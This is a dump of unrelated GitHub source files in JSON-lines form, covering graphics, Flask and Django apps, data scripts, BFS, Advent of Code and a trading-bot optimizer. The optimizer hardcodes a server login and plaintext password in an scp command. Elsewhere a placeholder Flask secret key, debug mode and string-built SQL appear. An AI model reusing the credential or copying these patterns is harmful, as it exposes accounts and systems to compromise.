glDrawElements(GL_TRIANGLES, iarr.size, GL_UNSIGNED_INT, iarr)\n\n glPopMatrix()\n\n glDisable(GL_LIGHTING)\n\ndef drawFrame():\n glBegin(GL_LINES)\n glColor3ub(255, 0, 0)\n glVertex3fv(np.array([0.,0.,0.]))\n glVertex3fv(np.array([1.,0.,0.]))\n glColor3ub(0, 255, 0)\n glVertex3fv(np.array([0.,0.,0.]))\n glVertex3fv(np.array([0.,1.,0.]))\n glColor3ub(0, 0, 255)\n glVertex3fv(np.array([0.,0.,0]))\n glVertex3fv(np.array([0.,0.,1.]))\n glEnd()\n\ndef key_callback(window, key, scancode, action, mods):\n global gCamAng, gCamHeight, object_C, R_, G_, B_\n \n if action==glfw.PRESS or action==glfw.REPEAT:\n if key==glfw.KEY_1:\n gCamAng += np.radians(-10)\n elif key==glfw.KEY_3:\n gCamAng += np.radians(10)\n elif key==glfw.KEY_2:\n gCamHeight += .1\n elif key==glfw.KEY_W:\n gCamHeight += -.1\n\n\n elif key==glfw.KEY_R:\n if(R_ == 0):\n R_ = 1.\n elif(R_ == 1):\n R_ = 0.\n\n elif key==glfw.KEY_G:\n if(G_ == 0):\n G_ = 1.\n elif(G_ == 1):\n G_ = 0.\n \n elif key==glfw.KEY_B:\n if(B_ == 0):\n B_ = 1.\n elif(B_ == 1):\n B_ = 0.\n \n\ndef main():\n global gVertexArraySeparate\n\n if not glfw.init():\n return\n window = glfw.create_window(480,480,'2019060164', None,None)\n if not window:\n glfw.terminate()\n return\n glfw.make_context_current(window)\n glfw.set_key_callback(window, key_callback)\n glfw.swap_interval(1)\n\n while not glfw.window_should_close(window):\n glfw.poll_events()\n render()\n glfw.swap_buffers(window)\n\n glfw.terminate()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"zzzl-523/ComputerGraphics","sub_path":"LabAssignment7/2/assignment7-2.py","file_name":"assignment7-2.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3418630828","text":"\"\"\"\nFlask Documentation: http://flask.pocoo.org/docs/\nJinja2 Documentation: http://jinja.pocoo.org/2/documentation/\nWerkzeug Documentation: http://werkzeug.pocoo.org/documentation/\n\nThis file creates your application.\n\"\"\"\n\nimport os\nfrom flask import Flask, render_template, request, redirect, url_for, session\nimport private\nimport pycn\n\napp = Flask(__name__)\n\nif 'SECRET_KEY' in os.environ:\n app.config['SECRET_KEY'] = os.environ['SECRET_KEY']\nelse:\n app.config['SECRET_KEY'] = 'this_should_be_configured'\n\nAUTH = pycn.OAuth2Handler(\n client_id=private.CLIENT_ID,\n client_secret=private.CLIENT_SECRET,\n redirect_uri=private.REDIRECT_URI\n )\n\n\n###\n# Routing for your application.\n###\n\n@app.route('/')\ndef home():\n \"\"\"Render website's home page.\"\"\"\n \n auth = session.get('auth',AUTH)\n\n try:\n connect_url = auth.get_authorization_url()\n except pycn.AuthorizationURLError:\n app.logger.error('Cannot get the authorization URL.')\n\n api = None\n if auth.access_token:\n api = pycn.API(auth)\n\n return render_template('home.html', connect_url=connect_url, api=api)\n \n@app.route('/products/')\ndef products():\n \"\"\"Render website's products.\"\"\"\n\n auth = session.get('auth',AUTH)\n api = pycn.API(auth)\n \n return render_template('products.html', products=api.products())\n\n\n@app.route('/browse/')\ndef browse():\n \"\"\"Render the website's browse page.\"\"\"\n # Get the \"code\" value\n code = request.args.get('code', '')\n\n # Use it to get an access token\n try:\n access_token = AUTH.get_access_token(code)\n session['auth'] = AUTH\n except pycn.AccessTokenError:\n app.logger.error('Error! Failed to get access token.')\n \n api = pycn.API(AUTH)\n\n return render_template('browse.html', access_token=access_token, my_profile=api.my_profile())\n\n@app.route('/about/')\ndef about():\n \"\"\"Render the website's about page.\"\"\"\n return render_template('about.html')\n\n\n###\n# The functions below should be applicable to all Flask apps.\n###\n\n@app.route('/.txt')\ndef send_text_file(file_name):\n \"\"\"Send your static text file.\"\"\"\n file_dot_text = file_name + '.txt'\n return app.send_static_file(file_dot_text)\n\n\n@app.after_request\ndef add_header(response):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=600'\n return response\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n \"\"\"Custom 404 page.\"\"\"\n return render_template('404.html'), 404\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"consumerio/pycn-example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15122812850","text":"#Image Difference\n\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimageName1 = 'Mount_Fuji.jpg'\nimageName2 = 'ocean.jpg'\n\ndef diff(img1, img2):\n diffImage = (img1 - img2) + (img2 - img1)\n #diffImage = cv2.absdiff(img1,img2)\n return diffImage\n\n#load a color image in grayscale\nimage1 = cv2.imread(imageName1, 0)\nimage2 = cv2.imread(imageName2, 0)\n\n#print the image size\nprint(\"Shape img 1: \" + str(image1.shape))\nprint(\"Shape img 2: \" + str(image2.shape))\n\n\n#resize the images to be the same size\nimage1 = image1[:803,200:1400]\nimage2 = image2[:803,:1200]\n\nimage3 = diff(image1,image2)\nimageName3 = \"Difference_Image.jpg\"\ncv2.imwrite(imageName3,image3)\n\ncv2.imshow(imageName3, np.array(image3, dtype=np.uint8))\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"ataffe/computer_vision","sub_path":"2_Image_Difference/Image_Diff.py","file_name":"Image_Diff.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28169756607","text":"\n#test sdd deep learning\n\nfrom sdd_Communication import sdd_client\n#from sdd_Communication.sdd_download_images import get_defect_image\nfrom sdd_util.sdd_database import db_extraction\nfrom config import class_json\nimport glob\nimport json \nimport os\nimport config \n\n\n\n\n#print(class_json)\n#####################################################################\ntest_image_root = '/sdd_images/crop_image/89005/*.jpg'\ntest_image = glob.glob(test_image_root)\n#print(test_image)\nprint('test')\n#####################################################################\n\n#while 1:\n# coil_id = get_defect_image(crop=True)\n\nget_data_query = \"\"\"SELECT TOP 1000 [no]\n ,[defect_no]\n ,[sdd_class]\n ,[deep_class]\n ,[deep_class_name]\n ,[deep_accuracy]\n FROM [2HAP_Deep_Test].[dbo].[prediction]\"\"\"\n\ninsert_query =\"\"\"insert into [2HAP_Deep_Test].[dbo].[prediction] \n values('{0}','{1}','{2}','{3}','{4}','{5}','{6}')\"\"\"\n \nsdd_deep_test_db = db_extraction(config.server_name,config.database_name) #database\n\nwith open(class_json)as json_file: #label name json load\n json_data=json.load(json_file)\n#print(json_data)\nscc = sdd_client.client() #crop image client \nfor i,im in enumerate(test_image): \n coil_id,defect_no,no = os.path.basename(os.path.splitext(im)[0]).split('_')\n print('no: %s,coil_id: %s,defect_no: %s' %(no,coil_id,defect_no))\n predict = scc.get_predict(im).decode('utf-8') \n key_no = predict.split(':')[0] #dict keys\n print(json_data[key_no],predict)\n #database insert\n sdd_deep_test_db.insert_data(insert_query.format(no,coil_id,defect_no,0,0,json_data[key_no],predict.split(':')[1]).replace(\"\\n\",\"\")) #database insert\nsdd_deep_test_db.close() #database close","repo_name":"neuroph12/sdd_deep_learning_test","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14120069617","text":"#!/usr/bin/env python\n\n# Setuptools module description for the Moca Dispatch Server\n\nfrom ez_setup import use_setuptools\nuse_setuptools()\nfrom setuptools import setup, find_packages\n\n#packages = find_packages(exclude='tests')\npackages = ['moca',]\n\nsetup(name='Moca-MDS',\n version='1.0',\n description='The Moca Dispatch Server -- a Django middleware layer for the Moca project.',\n long_description=\"\"\"\nThe Moca Dispatch Server (MDS) is a middleware layer in for the Moca project\nwhich is used to abstract the connection between Moca clients and the backend\nEMR.\n\"\"\",\n author='Moca Mobile',\n author_email='moca-developers@mit.edu',\n url='http://www.mocamobile.org',\n license = \"BSD\",\n include_package_data = True,\n packages=packages,\n scripts=['scripts/requirements.txt',],\n package_dir = {\n 'moca': 'moca',\n },\n package_data={'moca': ['templates/*', 'media/*', 'settings.py.tmpl']},\n install_requires=['Django>=1.1.1',],\n classifiers = [\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n ],\n )\n","repo_name":"addisclinic/mobile-dispatch-server","sub_path":"mds/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"9342839352","text":"# importing modules to be used\nfrom django import forms\nfrom django.db.models import fields\nfrom django.forms import widgets\nfrom blog import models\nfrom blog.models import Post,Comment\n\n# class for forms that are based on the models\nclass PostForm(forms.ModelForm):\n \n # a class within a class to connect to the model\n class Meta:\n model = Post\n fields = ('author','title','text')\n\n # widgets to access specific element of the post and apply css classes\n widgets = {\n 'title':forms.TextInput(attrs={'class':'textinputclass'}),\n 'text':forms.Textarea(attrs={'class':'editable medium-editor-textarea postcontent'})\n }\n\n# class for forms that are based on the models\nclass CommentForm(forms.ModelForm):\n\n # a class within a class to connect to the model\n class Meta:\n model = Post\n fields = ('author','text')\n\n # widgets to access specific elements of the comment and apply css classes\n widgets = {\n 'author':forms.TextInput(attrs={'class':'textinputclass'}),\n 'text':forms.Textarea(attrs={'class':'editable medium-editor-textarea'})\n }\n\n\n \n","repo_name":"mickiyas123/Python-and-Django-Bootcamp","sub_path":"Blog Project Clone1/mysite/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28252683837","text":"from typing import List\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkList:\n def __init__(self):\n self.head = None\n\n def insert_head(self, data):\n new_node = Node(data)\n if self.head:\n new_node.next = self.head\n self.head = new_node\n\n def append(self, data):\n if self.head is None:\n self.insert_head(data)\n else:\n cur = self.head\n while cur.next:\n cur = cur.next\n cur.next = Node(data)\n\n def insert(self, i, data):\n if self.head is None or i == 1:\n self.insert_head(data)\n else:\n new_node = Node(data)\n cur = self.head\n pre = cur\n j = 1\n while j < i:\n pre = cur\n cur = cur.next\n pre.next = new_node\n new_node.next = cur\n\n def linklist(self, obj: List):\n new_node = Node(obj[0])\n self.head = new_node\n cur = new_node\n for i in obj[1:]:\n cur.next = Node(i)\n cur = cur.next\n\n def print_list(self):\n cur = self.head\n while cur:\n print(cur.data)\n cur = cur.next\n\n def del_head(self):\n if self.head is None:\n print('空链表')\n else:\n self.head = self.head.next\n\n def del_tail(self):\n if self.head is None:\n print('空链表')\n else:\n cur = self.head\n pre = cur\n while cur.next:\n pre = cur\n cur = cur.next\n pre.next = None\n return cur.data\n\n def __repr__(self):\n cur = self.head\n str_1 = ''\n while cur:\n str_1 = str_1 + 'Node(%s)-->' % (cur.data)\n cur = cur.next\n return str_1 + 'END'\n\n\na = LinkList()\n\na.linklist([1, 23, 4, 5])\nprint(a)\na.del_tail()\nprint(a)\n","repo_name":"q798010412/untitled2","sub_path":"6.19/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1506062258","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n path = []\n array = [['.']*n for i in range(n)] # 棋盘\n \n def isValid(array,row,col):\n for i in range(row): # 列重复\n if array[i][col] == 'Q':return False\n for i in range(1,row+1):\n if col-i>=0 and array[row-i][col-i]=='Q':return False # 左上角重复\n if col+i < n and array[row-i][col+i] == 'Q':return False # 右上角重复\n return True\n \n def dfs(array,row):\n if row==n:\n path=[]\n for i in range(n):\n path.append(''.join(array[i]))\n res.append(path[:])\n return \n \n for i in range(n):\n if isValid(array,row,i):\n array[row][i]='Q'\n dfs(array,row+1)\n array[row][i]='.'\n \n dfs(array,0)\n return res","repo_name":"sadbird1729/LeetcodeRepo","sub_path":"51-n-queens/51-n-queens.py","file_name":"51-n-queens.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17880393625","text":"import time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\n\nbrowser = webdriver.Chrome()\nurl = 'http://www.runoob.com/try/try.php?filename=jqueryui-api-droppable'\nbrowser.get(url)\nbrowser.switch_to.frame('iframeResult')\ntry:\n logo = browser.find_element_by_class_name('logo')\nexcept NoSuchElementException:\n print('NO LOGO')\nbrowser.switch_to.parent_frame()\nlogo = browser.find_element_by_class_name('logo')\nprint(logo)\nprint(logo.text)","repo_name":"JasonSam1996/Python3CrawlerDemo","sub_path":"7_1/SeleniumDemo9.py","file_name":"SeleniumDemo9.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69850372325","text":"## @Author: Felipe Ferreira Dev\n\n\nimport collections\n\n# Algoritmo BFS\n\n# Define função (graph = mapa/grafo, city_begin = cidade inicial, city_end = cidade final)\ndef bfs(graph, city_begin, city_end):\n\n # Visited -> Seta como vazio, deque -> maneira mais facil de trabalhar com listas\n visited, lista = set(), collections.deque([city_begin])\n visited.add(city_begin)\n\n while lista:\n\n # Retira um vertice da fila (vertex = vertice)\n vertex = lista.popleft()\n print(str(vertex) + \" \", end=\"\")\n if city_end == str(vertex):\n exit()\n\n\n # Percorre o grafo pelo vertice e atribui ao neighbour\n for neighbour in graph[vertex]:\n # Se ele ainda não foi visitado, é adicionado a lista de visitado\n # Visited -> Lista de visitados\n if neighbour not in visited:\n visited.add(neighbour)\n # Insere um registro após último elemento\n lista.append(neighbour)\n\n\n# Controle do escopo da execução\nif __name__ == '__main__':\n graph = { \n \"Oradea\": [\"Zerind\", \"Sibiu\"],\n \"Zerind\": [\"Arad\", \"Oradea\"],\n \"Arad\": [\"Zerind\", \"Sibiu\", \"Timisoara\"],\n \"Sibiu\": [\"Oradea\", \"Fagaras\", \"Arad\", \"Rimnicu_Vilcea\"],\n \"Fagaras\": [\"Sibiu\", \"Bucharest\"],\n \"Timisoara\": [\"Arad\", \"Lugoj\"],\n \"Rimnicu_Vilcea\": [\"Sibiu\", \"Craiova\", \"Pitesti\"],\n \"Lugoj\": [\"Timisoara\", \"Mehadia\"],\n \"Pitesti\":[\"Rimnicu_Vilcea\", \"Bucharest\", \"Craiova\"],\n \"Mehadia\":[\"Lugoj\", \"Dobreta\"],\n \"Dobreta\":[\"Mehadia\", \"Craiova\"],\n \"Craiova\":[\"Dobreta\", \"Rimnicu_Vilcea\", \"Pitesti\"],\n \"Bucharest\":[\"Pitesti\", \"Fagaras\", \"Giurgiu\", \"Urziceni\"],\n \"Giurgiu\":[\"Bucharest\"],\n \"Urziceni\":[\"Bucharest\", \"Hirsova\", \"Vaslui\"],\n \"Hirsova\":[\"Urziceni\", \"Eforie\"],\n \"Eforie\":[\"Hirsova\"],\n \"Vaslui\":[\"Urziceni\", \"Lasi\"],\n \"Lasi\":[\"Vaslui\", \"Neamt\"],\n \"Neamt\":[\"Lasi\"]\n}\n\n # Pede para o usuário as cidades\n city_begin = input(\"Digite a cidade inicial: \\n\")\n city_end = input(\"Digite a cidade final: \\n\")\n print(\"\\n****************************************\")\n # Chama a função\n bfs(graph, city_begin, city_end)\n","repo_name":"FelipeFerreiraDev/Atividades-Programacao-Faculdade","sub_path":"Python/Algoritmos de busca/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33245851083","text":"def day17():\r\n from collections import deque\r\n def takedigits(instr):\r\n starts_with_x = instr[0]==\"x\"\r\n filtered = \"\".join([x if x.isdigit() else \" \" for x in instr])\r\n return [starts_with_x]+[int(x) for x in filtered.split()]\r\n\r\n with open(\"day_17_AOC.txt\") as fh:\r\n data = [takedigits(x) for x in fh.readlines()]\r\n\r\n clayset = set([])\r\n for line in data:\r\n if line[0]:\r\n x, y0, y1 = line[1:]\r\n for y in range(y0,y1+1):\r\n clayset.add((x,y))\r\n else:\r\n y, x0, x1 = line[1:]\r\n for x in range(x0,x1+1):\r\n clayset.add((x,y))\r\n\r\n waterset=set([])\r\n flowing_water_set=set([])\r\n\r\n start_points =set([(500,0)])\r\n registered_points = set([(500,0)])\r\n\r\n minx = min([x[0] for x in clayset])\r\n maxx = max([x[0] for x in clayset])\r\n miny = min([x[1] for x in clayset])\r\n maxy = max([x[1] for x in clayset])\r\n\r\n columns_of_interest = set(range(minx-1,maxx+2))\r\n\r\n\r\n def hflow_one_side(current_row, current_col,d_col=1): # dcol = 1 when searching right and -1 left\r\n while True:\r\n cell_below = (current_col, current_row + 1)\r\n cell_ajacent = (current_col+d_col, current_row)\r\n if (cell_below not in waterset) and (cell_below not in clayset):\r\n return [\"hole\",cell_below]\r\n if (cell_ajacent in clayset):\r\n return [\"wall\",(current_col,current_row)] #return cell ajacent to wall, last cell to hold water)\r\n current_col+=d_col\r\n\r\n\r\n def do_hflow(current_row, current_col):\r\n sideflow_results= [hflow_one_side(current_row, current_col,d_col=x) for x in [-1,1]]\r\n hole_locs = [x[1] for x in sideflow_results if x[0] == \"hole\"]\r\n if len(hole_locs) ==2:\r\n if hole_locs[1] not in registered_points:\r\n registered_points.add(hole_locs[1])\r\n start_points.add(hole_locs[1])\r\n flowing_water_set.update([(col, current_row) for col in range(hole_locs[0][0],hole_locs[1][0]+1)])\r\n return([\"hole\",hole_locs[0]])\r\n else:\r\n hole_locs=hole_locs[:-1]\r\n if len(hole_locs)==1:\r\n flowing_water_set.update([(col, current_row) for col in range(sideflow_results[0][1][0],\r\n sideflow_results[1][1][0]+1)])\r\n return [\"hole\",hole_locs[0]] #return hole if one side has one\r\n\r\n return [\"walls\",[x[1][0] for x in sideflow_results]] #return column nrs for walls\r\n\r\n\r\n while start_points:\r\n #start one cascade\r\n start_loc = start_points.pop()\r\n current_col,current_row = start_loc\r\n water_vertical_flow_record=deque([(current_col, current_row)])\r\n\r\n while current_row<= maxy:\r\n cell_below = (current_col,current_row+1)\r\n if (cell_below in waterset) or (cell_below in clayset):\r\n walls_or_hole, locationdata = do_hflow(current_row,current_col)\r\n\r\n if walls_or_hole == \"hole\":\r\n water_vertical_flow_record.append((current_col, current_row))\r\n current_col,current_row = locationdata\r\n\r\n elif walls_or_hole == \"walls\":\r\n waterfields = [(col,current_row) for col in range(locationdata[0],locationdata[1]+1)]\r\n waterset.update(waterfields)\r\n\r\n return_loc = water_vertical_flow_record.pop()\r\n if return_loc == start_loc:\r\n break\r\n else:\r\n current_col, current_row = return_loc\r\n\r\n else: #we can drop down\r\n water_vertical_flow_record.append((current_col, current_row))\r\n flowing_water_set.add((current_col, current_row))\r\n current_col,current_row = cell_below\r\n\r\n def print_grid():\r\n for rownr in range(miny,maxy+1):\r\n row=[]\r\n for colnr in range(minx,maxx+1):\r\n symbol = '.'\r\n if (colnr,rownr) in clayset:\r\n symbol = \"#\"\r\n if (colnr,rownr) in flowing_water_set:\r\n symbol = \"|\"\r\n if (colnr,rownr) in waterset:\r\n symbol =\"~\"\r\n row.append(symbol)\r\n print(\"\".join(row))\r\n\r\n\r\n print_grid()\r\n all_water = waterset|flowing_water_set\r\n print(\"nr of water\",len([(x,y) for x,y in all_water if (y<= maxy) and (y>= miny)]))\r\n print(\"nr of stored water\",len([(x, y) for x, y in waterset if (y <= maxy) and (y >= miny)]))\r\nday17()\r\n\r\n","repo_name":"mbwillig/advent-of-code-2018","sub_path":"day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11808504107","text":"from itertools import repeat\r\nfrom sklearn.model_selection import ParameterGrid\r\nfrom botProto1 import *\r\nimport warnings\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"frame\")\r\nargs = parser.parse_args()\r\n\r\nwarnings.filterwarnings(\"ignore\",category =RuntimeWarning)\r\n\r\nos.system(\"taskset -p 0xff %d\" % os.getpid())\r\n\r\n\r\nclass optimizer(object):\r\n\r\n def __init__(self,n_proc,frame):\r\n\r\n self.n_proc = n_proc\r\n self.error_vals = [2.0,5.0,10.0,15.0,20.0]\r\n self.stop_vals = [0.25,0.5,0.75,1.0,1.5,2.0]\r\n self.peak_vals = [5,10,15,20]\r\n self.atrs = [5, 7, 10, 14, 21]\r\n self.results = pd.DataFrame(columns=['stop','peak','error','atr_range','sharpe','apr','acc','exp'])\r\n self.frame = frame\r\n\r\n def prep(self):\r\n\r\n self.data = backtestData(frame=self.frame,n_split=500,pairs=['EUR_USD','GBP_USD','AUD_USD','NZD_USD'])\r\n self.bot = PatternBot(data=data,instrument=pairs,pairs=['EUR_USD','GBP_USD','AUD_USD','NZD_USD'])\r\n parameters = {'stop':self.stop_vals,'peak':self.peak_vals,'error':self.error_vals,'atrs':self.atrs}\r\n self.grid = ParameterGrid(parameters)\r\n\r\n stops = [d['stop'] for d in self.grid]\r\n peaks = [d['peak'] for d in self.grid]\r\n error = [d['error'] for d in self.grid]\r\n atrs = [d['atrs'] for d in self.grid]\r\n\r\n self.grid = list(zip(stops,peaks,error,atrs))\r\n\r\n\r\n def ret_func(self,retval):\r\n\r\n retval = retval[1]\r\n\r\n now = time.time()\r\n self.results = self.results.append({'stop':retval[0],'peak':retval[1],'error':retval[2],'atr_range':retval[3],'sharpe':retval[4],\r\n 'apr':retval[5],'acc':retval[6],'exp':retval[7]},ignore_index=True)\r\n\r\n percent = 100*float(len(self.results))/float(len(self.grid))\r\n\r\n elapsed = now - self.start\r\n total = elapsed*(1/(percent/100.0))\r\n remaining = total - elapsed\r\n\r\n print(round(percent),'% ','[Sharpe APR ACC EXP] = [',round(self.results.sharpe.max(),2),round(self.results.apr.max(),2),\r\n round(self.results.acc.max(),2),round(self.results.exp.max(),2),']')\r\n print('Elapsed: ',round(elapsed),'Remaining: ',round(remaining))\r\n\r\n if round(percent)%5==0:\r\n self.results.to_csv('OptimizationResults-'+self.frame+'.csv')\r\n\r\n def search(self):\r\n\r\n self.start = time.time()\r\n\r\n p = multiprocessing.Pool(processes=self.n_proc)\r\n print(self.n_proc)\r\n results = []\r\n\r\n for x, y in zip(repeat(self.data),self.grid):\r\n\r\n r = p.apply_async(self.bot.backtest,(x,y),callback=self.ret_func)\r\n\r\n p.close()\r\n p.join()\r\n\r\n # Push Results to the Web\r\n\r\n # Create HTML Code\r\n\r\n selection = [\"' for i in zip(self.results.stop,\r\n self.results.peak,\r\n self.results.error,self.results.atr_range)]\r\n self.results['selection'] = selection\r\n\r\n ip, user, passwd = 'hedgefinancial.us', 'hedgefin@146.66.103.215', 'Allmenmustdie1!'\r\n self.results = self.results[['selection','sharpe','apr','acc','exp','stop','atr_range','peak','error']]\r\n self.results.columns = [['Selection','Sharpe Ratio','APR','Accuracy','Expectancy (pips)','ATR Factor','ATR Range','Peak Parameter','Error']]\r\n self.results = self.results.round(2)\r\n\r\n\r\n self.results.to_csv('BTData/'+self.frame+'/master.csv')\r\n\r\n filepath = '~/public_html/hedge_vps/Backtests/proto2/' + self.frame + '/'\r\n additional_path = '~/Desktop/harmonics-1/Live\\ Testing/BTData/'+self.frame+'/master.html'\r\n\r\n os.system('csvtotable '+ 'BTData/'+self.frame+'/master.csv BTData/'+self.frame+'/master.html -c \\'Available Backtests\\' >/dev/null')\r\n\r\n cmd = 'scp -P 18765 %s %s:%s' % (additional_path, user, filepath)\r\n os.system(cmd)\r\n os.system('rm '+additional_path+' '+additional_path.replace('.html','.csv'))\r\n\r\n print('***************************')\r\n print('Exiting, Optimization Complete')\r\n\r\nif __name__ == '__main__':\r\n\r\n #multiprocessing.freeze_support()\r\n\r\n opt = optimizer(n_proc=4,frame=args.frame)\r\n opt.prep()\r\n print('Data Prepped, beginning search')\r\n opt.search()\r\n","repo_name":"ddm-j/harmonics-1","sub_path":"Live Testing/parameter_optimization.py","file_name":"parameter_optimization.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"39997936781","text":"#Given an array of sorted numbers and a target sum, \n#find a pair in the array whose sum is equal to the given target.\n\nfrom pickle import TRUE\n\n\narr =[1, 2, 3, 4, 6]\ntarget=6\n\nleft = 0\nright = len(arr)-1\ns = 0\nwhile(lefttarget):\n right = right-1\n\nif(s==0):\n print(\"failure, not found\")\n\n ","repo_name":"saibalagi006/Data-Structures-and-Algorithms","sub_path":"DSA_004_Two_Pointers_sum.py","file_name":"DSA_004_Two_Pointers_sum.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22811828145","text":"'''\nModule : Software for Digital Innovation \nAssessment : ICA-2 (Freedom Of Information)\nProject Name : Freedom Of Information\n\n@author: Mohana Kamanooru\nemail : A0223038@live.tees.ac.uk\n'''\n#########################################################\n# # File Name: test_process_SSdata.py\n# # Purpose : perform unit testing for process_SSdata.py\n#########################################################\n\nimport unittest\n\nfrom Freedom_Of_Information.views import process_SSdata\nfrom Freedom_Of_Information.views.process_SSdata import ssForce\n\n\nclass TestProcess_SSdata(unittest.TestCase):\n \n def test_get_filtered_flist(self):\n ssForce_obj = ssForce()\n ssForce_obj.get_forces_df() \n fdict = ssForce_obj.get_filtered_flist([\"cleveland\"])\n self.assertEqual(fdict.values[0], \"Cleveland Police\")\n \n def test_process(self):\n process_obj = process_SSdata.process_SSdata('2020-11', ['cleveland'])\n process_obj.process()\n self.assertEqual(len(process_obj.ss_df), 592)\n process_obj = process_SSdata.process_SSdata('2020-09', ['cleveland'])\n process_obj.process()\n self.assertEqual(len(process_obj.ss_df), 416)\n process_obj = process_SSdata.process_SSdata('2020-12', ['cleveland'])\n process_obj.process()\n self.assertEqual(len(process_obj.ss_df), 0)\n\n\n def test_get_forces_df(self):\n ssForce_obj = ssForce()\n ssForce_obj.get_forces_df()\n self.assertEqual(ssForce_obj.force_df.size, 88)\n \n \nif __name__ == \"__main__\": \n unittest.main()\n \n","repo_name":"mohanakamanooru/Python","sub_path":"FlaskWebFramework/Freedom_Of_Information/views/test_process_SSdata.py","file_name":"test_process_SSdata.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32998080647","text":"## Dataset : https://archive.ics.uci.edu/ml/datasets/student%2Bperformance\n## Video : https://techwithtim.net/tutorials/machine-learning-python/linear-regression/\n\n\nimport pandas as pd\nimport numpy as np\nimport sklearn\nfrom sklearn import linear_model\nimport matplotlib.pyplot as pyplot\nimport pickle\nfrom matplotlib import style\n\n\n\"\"\"STEP1\"\"\"\n#Reading students data csv\ndata = pd.read_csv(\"C:\\SelfDownload\\RegressionAlgos\\student_mat.csv\", sep=\";\")\n#print(data.head())\n\n\n\"\"\"STEP2\"\"\"\n#Choosing the features need to be used for predction (List of attributes from the data set)\ndata = data[[\"G1\", \"G2\", \"G3\", \"studytime\", \"failures\", \"absences\"]]\n\n\n\"\"\"Label that needs to be predcited\"\"\"\npredict = \"G3\"\n\n\"\"\"STEP3\"\"\"\n#Choosing the features need to be used for predction (List of attributes from the data set)\nX = np.array(data.drop([predict], 1))\n# print(\"The value of x is \\n\", X)\n\n\"\"\"STEP4\"\"\"\n#Define label (List of attributes from the data set that needs to be predicted)\ny = np.array(data[predict])\n# print(\"The value of y is \\n\", y)\n\n\n##------------------------------------------------------------------------------------------------##\n\"\"\" \n We want to achieve the best accuracy, thats why iterating over the below logic to attain the \n best results. This needs to be done only once, because once the model is trained then we can \n comment out the below code (from STEP5 till STEP8) and work.\n\"\"\"\n\nbest = 0\nfor _ in range(30):\n \"\"\"STEP5\"\"\"\n #Splitting training and testing data using train_test_split library\n x_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size=0.1)\n\n\n \"\"\"STEP6\"\"\"\n #Initializing linear regression model\n model = linear_model.LinearRegression()\n\n \"\"\"STEP7\"\"\"\n #Fitiing training data into model (Training the data set here)\n model.fit(x_train, y_train)\n\n \"\"\"\"Additional Calculations\"\"\"\n #showing the score (accurancy of the predcition model)\n accuracy = model.score(x_test, y_test)\n print('Accuracy (Score) \\n', accuracy)\n\n\n \"\"\" Saving the model using pickle \"\"\"\n\n if accuracy > best:\n best == accuracy\n \"\"\"STEP8\"\"\"\n ##Saves the pickle file in the directory (Pickle just saves the model)\n with open(\"studentmodel.pickle\", \"wb\") as f:\n pickle.dump(model, f)\n##------------------------------------------------------------------------------------------------##\n\n\n\"\"\"STEP9\"\"\"\n##open a file saved by pickle\npickle_in = open(\"studentmodel.pickle\", 'rb')\n\n\"\"\"STEP10\"\"\"\n##loading pickle in linear model\nlinear = pickle.load(pickle_in)\n\n\n\"\"\"STEP11\"\"\"\n#Predicting the testing data set\npredictions = linear.predict(x_test)\n\n##Printing all the predictions,with the given input data set\nfor x in range(len(predictions)):\n print(predictions[x], x_test[x], 